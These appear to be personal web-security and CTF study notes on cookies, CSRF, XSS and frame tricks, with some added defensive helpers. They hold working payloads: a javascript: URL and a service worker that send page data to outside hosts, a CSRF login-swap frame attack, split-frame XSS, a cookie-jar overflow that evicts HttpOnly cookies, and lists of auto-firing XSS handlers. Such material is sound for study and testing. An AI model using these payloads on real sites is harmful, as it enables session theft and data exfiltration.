Origin vs. site (github.io is a public suffix, so each user site is its own site)

URL: https://www.cjis.ooo

- origin = scheme + host + port: https + www.cjis.ooo + 443
- site = scheme + eTLD+1: https + cjis + ooo

SameSite cookie attribute

- None: no restriction
- Lax (default): sent on top-level navigation, e.g. an href link or a form GET
- Strict: sent only on same-site requests

For any flows involving POST requests, you should test with and without a long delay. This is because both Firefox and Chrome implement a two-minute threshold that permits newly created cookies without the SameSite attribute to be sent on top-level, cross-site POST requests (a common login flow).
HttpOnly

Overflowing the cookie jar evicts the oldest cookies, so a cookie script could not otherwise touch (an HttpOnly one) gets pushed out and can then be replaced:

```javascript
for (let i = 0; i < 1000; ++i) {
  document.cookie = 'cookie' + i + '=aaa';
}
// old cookie is deleted!
document.cookie = 'victim=aaaaaa';
```
Defense mechanisms

Custom header, e.g. `X-CSRF-HEADER: 1`. Depending on the server's CORS policy, specifically the `Access-Control-Allow-Headers` it sends in the response, this may still be attackable.

Method override: a GET that the framework treats as a POST

```
GET /app?_method=POST
X-HTTP-Method-Override
```

`__Host-` prefix: a cookie from a sibling host such as vuln.target.com would otherwise apply to *.target.com; the prefix refuses it.
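A linter for the cookie attributes covered above (SameSite, HttpOnly, Secure and the `__Host-` prefix rules), added here as an example rather than taken from the notes; the finding messages are this example's own wording.

```javascript
// Added example (not from the original notes): lint one Set-Cookie header value
// against the attributes discussed above. Messages are this example's own.
const LAX_GRACE_NOTE =
  'no SameSite: defaults to Lax, but Chrome and Firefox still send a cookie ' +
  'younger than two minutes on top-level cross-site POST';

// Split "name=value; Attr; Attr=value" into the name and a lowercase attribute map.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const attrs = {};
  for (const attr of rest) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, attrs };
}

// Returns a list of findings; an empty list means the cookie passes every check.
function lintSetCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const findings = [];
  const sameSite = typeof attrs.samesite === 'string' ? attrs.samesite.toLowerCase() : null;
  if (sameSite === null) findings.push(LAX_GRACE_NOTE);
  if (sameSite === 'none' && !attrs.secure) findings.push('SameSite=None requires Secure');
  if (!attrs.httponly) findings.push('no HttpOnly: readable by script');
  if (name.startsWith('__Host-')) {
    // __Host- binds the cookie to exactly this host: Secure, no Domain, Path=/
    if (!attrs.secure) findings.push('__Host- requires Secure');
    if ('domain' in attrs) findings.push('__Host- forbids Domain');
    if (attrs.path !== '/') findings.push('__Host- requires Path=/');
  }
  return findings;
}
```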
Content-Type validation that only checks the type/subtype substring and ignores parameters, e.g.

```
text/plain; application/json
```

bypasses the validation if the server uses `includes('application/json')` to determine the media type. See CVE-2022-21703 (Grafana CSRF).

The media types an HTML form can send:

- application/x-www-form-urlencoded
- multipart/form-data
- text/plain
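The substring check described above, beside a check that parses the media type first. This is an added example and not Grafana's code; the function names are this example's own.

```javascript
// Added example (not from the original notes or from Grafana): the weak substring
// check next to a check that parses the media type before deciding.

// Vulnerable: matches 'application/json' anywhere, including inside a parameter.
function weakIsJson(contentType) {
  return contentType.includes('application/json');
}

// Split "type/subtype; key=value; ..." into the essence and its parameters.
function parseMediaType(contentType) {
  const [essence, ...params] = contentType.split(';').map(s => s.trim());
  const parameters = {};
  for (const p of params) {
    const eq = p.indexOf('=');
    if (eq === -1) continue; // "text/plain; application/json": no key=value, dropped
    const key = p.slice(0, eq).trim().toLowerCase();
    parameters[key] = p.slice(eq + 1).trim().replace(/^"(.*)"$/, '$1');
  }
  return { essence: essence.toLowerCase(), parameters };
}

// Hardened: only the type/subtype essence decides.
function strictIsJson(contentType) {
  return parseMediaType(contentType).essence === 'application/json';
}

// The three media types an HTML form can produce; anything else needs script,
// which means a CORS preflight for a cross-origin request.
const FORM_ENCTYPES = ['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain'];

function formCanSend(contentType) {
  return FORM_ENCTYPES.includes(parseMediaType(contentType).essence);
}
```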
Payload as a `javascript:` URL:

```javascript
javascript:fetch('https://ntu.im/flag').then(r=>r.text()).then(d=>fetch('https://cjiso.ninja/'+btoa(d)))
```

Text fragment syntax:

```
#:~:text=[prefix-,]textStart[,textEnd][,-suffix]
context |-------match-----| context
```
window.name survives navigation

A `<meta>` refresh navigation keeps `window.name = 'xxx'`.

```javascript
// first make the child same-origin with the parent;
// loading it does not reset the frame's name
frame.src = 'parent origin...';
frame.contentWindow.name;
```

```javascript
// victim first visits evil.html
name = 'qwer';
location = 'xss.html'; // redirect to the xss site

// xss.html
eval(name); // xss
```
Form targeting a named iframe:

```html
<iframe name=i1></iframe>
<form target=i1 action="https://c.cjsi.ooo"></form>
```

A text/plain form produces a JSON-looking body (text/plain avoids URL encoding):

```html
<form enctype=text/plain method=POST>
<input name='{"key":"' value='somevalue"}'>
</form>
```

Body sent: `{"key":"somevalue"}` with Content-Type text/plain.

`iframe.name` is accessible across origins.
```html
<body>
<!-- sensitive data -->
<iframe id="qwe" src="https://typeselfsub.web.ctfcompetition.com/flag"></iframe>
<!-- logout frame -->
<iframe id="zxc" name="zxc"></iframe>
<!-- login frame -->
<iframe id="asd" name="asd"></iframe>
<form id="form1" target="zxc" method="get" action="https://typeselfsub.web.ctfcompetition.com/logout"></form>
<form id="form2" target="asd" method="post" action="https://typeselfsub.web.ctfcompetition.com/login">
<input name="username" value="jizz">
<input name="password" value="jizz">
</form>
<script>
setTimeout(()=>form1.submit(),2000);
setTimeout(()=>form2.submit(),5000);
</script>
<img src="https://c.cjiso.ninja/delay/10">
</body>
```
Reaching sibling frames through the frame tree:

```javascript
window.parent.frames[0]
top[0].document...
```

Length-limited XSS split across frames, each frame holding one piece:

```html
// leak data length 17
<iframe src='/flag'></iframe>
<iframe src='/?xss=b=top[0].document'></iframe>
<iframe src='/?xss=c=top[1].b.body'></iframe>
<iframe src='/?xss=d=top[2].c.innerHTML'></iframe>
<iframe src='/?xss=name=top[3].d'></iframe>
```

```html
// eval length 13
<iframe src='/?xss=a=`fetch("//`' id=start ></iframe>
<iframe src='/?xss=top[0].a%2b=`c`'></iframe>
<iframe src='/?xss=top[0].a%2b=`.`'></iframe>
<iframe src='/?xss=top[0].a%2b=`c`'></iframe>
<iframe src='/?xss=top[0].a%2b=`j`'></iframe>
<iframe src='/?xss=top[0].a%2b=`i`'></iframe>
<iframe src='/?xss=top[0].a%2b=`s`'></iframe>
<iframe src='/?xss=top[0].a%2b=`.`'></iframe>
<iframe src='/?xss=top[0].a%2b=`o`'></iframe>
<iframe src='/?xss=top[0].a%2b=`o`'></iframe>
<iframe src='/?xss=top[0].a%2b=`o`'></iframe>
<iframe src='/?xss=top[0].a%2b=`"`'></iframe>
<iframe src='/?xss=top[0].a%2b=`)`'></iframe>
<iframe src='/?xss=name=top[0].a'></iframe>
<script>
setTimeout(()=>{end.src='/?xss=eval(name)'},2000)
</script>
```
iframe srcdoc

```html
<iframe srcdoc="
<script src=/theme?cb=window.b.innerText=window.parent.document.body.innerText.slice></script>
<script src=/theme?cb=window.img.src=window.total.innerText.slice></script>
"></iframe>
```
Parser tricks

- `/` in place of a space: `<iframe/src=javascript:alert(1)></iframe>`
- `document.body.innerHTML=document.body.innerText`
- backtick `` ` `` in place of `'`
- `/a/.source`
- `\u2028`, `\u2029` in place of `\n`: `eval('x=123\u2028alert(x)')`
- `<meta>` can change the charset; works generally
- `//` is parsed as `http://`
- `\\` is parsed with the current origin's scheme
- `javascript:` with leading whitespace: `\n\tjavascript:alert(2)%0aalert(1)`
- on Windows, `\\` is parsed as `file://`
- `window.name == name`
- `<meta http-equiv="refresh" content="0;URL='http://url/'" />`
location sinks and sources

- location.href
- location.host
- location.hostname
- location.replace
- location.assign
- location.pathname
Event handlers that fire without user interaction

- onfocus on `<input>`, `<select>`, `<form>`, `<textarea>`, `<keygen>` (less supported): `<input autofocus onfocus=alert(1)>`
- ontoggle: `<details open ontoggle=alert(1)>`
- onerror: `<img src='aaaaaa' onerror=alert(1)>`
- onscroll: `<body onscroll=alert>` + n*`<br>` + `<input autofocus>`
- onstart: `<marquee onstart=alert(1)></marquee>`
- `<iframe src=javascript:alert(1)>`
Service worker

If no scope is given, the default scope is the directory level of the script.

```javascript
if ('serviceWorker' in navigator) {
  window.addEventListener('load', function() {
    navigator.serviceWorker.register('/sw.js', {scope: '/'}).then(function(registration) {
      // Registration was successful
      console.log('ServiceWorker registration successful with scope: ', registration.scope);
    }, function(err) {
      // registration failed :(
      console.log('ServiceWorker registration failed: ', err);
    });
  });
}
```

sw.js:

```javascript
self.addEventListener('fetch', function(e) {
  e.respondWith(caches.match(e.request).then(function(response) {
    fetch('https://c.cjsio.ninja/swdata/' + e.request.url);
    return response || fetch(e.request);
  }));
});
```
Duplicate query parameters

- URLSearchParams.get: first one wins
- $_GET: last one wins

about:blank

`src=/%gg` makes the reverse proxy choke and respond with a Bad Request that carries no CSP header.

Cookie tossing: change the cookie between the first and second request of a redirect chain, so the two requests carry different cookies.

```
'id=jizzzzzz; path=/'
'id=bbbbbbbb; path=/api'
```

A request to /api carries the Cookie header `id=bbbbbbbb; id=jizzzzzz`; servers usually parse the first one.
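The ordering above, simulated as an added example (not code from the notes): a browser-style path-first cookie order, then a first-wins server parse that also reports duplicate names so a server can reject the request instead of silently picking one. The jar contents are constructed from the two Set-Cookie lines above.

```javascript
// Added example (not from the original notes): simulate which cookies a browser
// attaches for a path, then parse the Cookie header the way a first-wins server
// does and flag duplicate names.

// RFC 6265 path-match: the cookie path is a prefix of the request path.
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || requestPath[cookiePath.length] === '/';
}

// Browsers order matching cookies by longer path first (then creation order),
// so a /api cookie is sent ahead of a / cookie with the same name.
function cookieHeaderFor(jar, requestPath) {
  return jar
    .map((c, created) => ({ ...c, created }))
    .filter(c => pathMatches(requestPath, c.path))
    .sort((a, b) => b.path.length - a.path.length || a.created - b.created)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// First occurrence wins, as the notes say most servers do; duplicates are
// collected so the caller can refuse the request.
function parseCookieHeader(header) {
  const cookies = new Map();
  const duplicates = [];
  for (const part of header.split(';')) {
    const s = part.trim();
    if (!s) continue;
    const eq = s.indexOf('=');
    const name = eq === -1 ? s : s.slice(0, eq);
    const value = eq === -1 ? '' : s.slice(eq + 1);
    if (cookies.has(name)) duplicates.push({ name, first: cookies.get(name), later: value });
    else cookies.set(name, value);
  }
  return { cookies: Object.fromEntries(cookies), duplicates };
}

// Constructed jar matching the two Set-Cookie lines in the notes.
const SAMPLE_JAR = [
  { name: 'id', value: 'jizzzzzz', path: '/' },
  { name: 'id', value: 'bbbbbbbb', path: '/api' },
];
```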
Some CDNs automatically serve JS files under fixed paths; some of those files can be used to bypass unsafe-eval.
https://twitter.com/kinugawamasato/status/1414648695904083988
https://twitter.com/kinugawamasato/status/893404078365069312?lang=en
Cloudflare
Cloudflare's pages have a /cdn-cgi/ directory with some interesting resources:
- scripts/{cf.common.js,cf.challenge.js,zepto.min.js}
- trace/
sourceMappingURL:

```html
<script>
//# sourceMappingURL=http://c.cjis.ooo/xssnote
</script>
```